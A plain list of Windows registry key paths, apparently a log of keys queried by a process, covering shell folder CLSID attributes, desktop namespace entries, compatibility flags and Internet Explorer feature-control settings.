HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoCommonGroups
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{04731B67-D933-450a-90E6-4ACD2E9408FE}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11016101-E366-4D22-BC06-4ADA335C892B}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{138508bc-1e03-49ea-9c8f-ea9e1d05d65d}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{26EE0668-A00A-44D7-9371-BEB064C98683}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{450D8FBA-AD25-11D0-98A8-0800361B1103}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{59031a47-3f72-44a7-89c5-5595fe6b30ee}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{89D83576-6BD1-4c86-9454-BEB04E94C819}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{9343812e-1c37-4a49-a12e-4b2d810d956b}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{B4FB3F98-C1EA-428d-A78A-D1F5659CBA93}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{BD7A2E7B-21CB-41b2-A086-B309680C6B7E}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{daf95313-e44d-46af-be1b-cbacea2c3065}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{e345f35f-9397-435c-8f95-4e922c26259e}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{ED228FDF-9EA8-4870-83b1-96b02CFE0D52}\SuppressionPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\SuppressionPolicy
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFolders
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\Desktop\NameSpace\DelegateFolders
HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{20D04FE0-3AEA-1069-A2D8-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{208D2C60-3AEA-1069-A2D7-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32\LoadWithoutCOM
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Blocked
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\AppCompatibility
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\AppCompat
HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{871c5380-42a0-1069-a2ea-08002b30309d}\InProcServer32
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\ieframe.dll
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{871C5380-42A0-1069-A2EA-08002B30309D} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\CEIPEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Objects\{871C5380-42A0-1069-A2EA-08002B30309D}
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wscript.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\*
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562
HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_CLASSES_ROOT\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsParseDisplayName
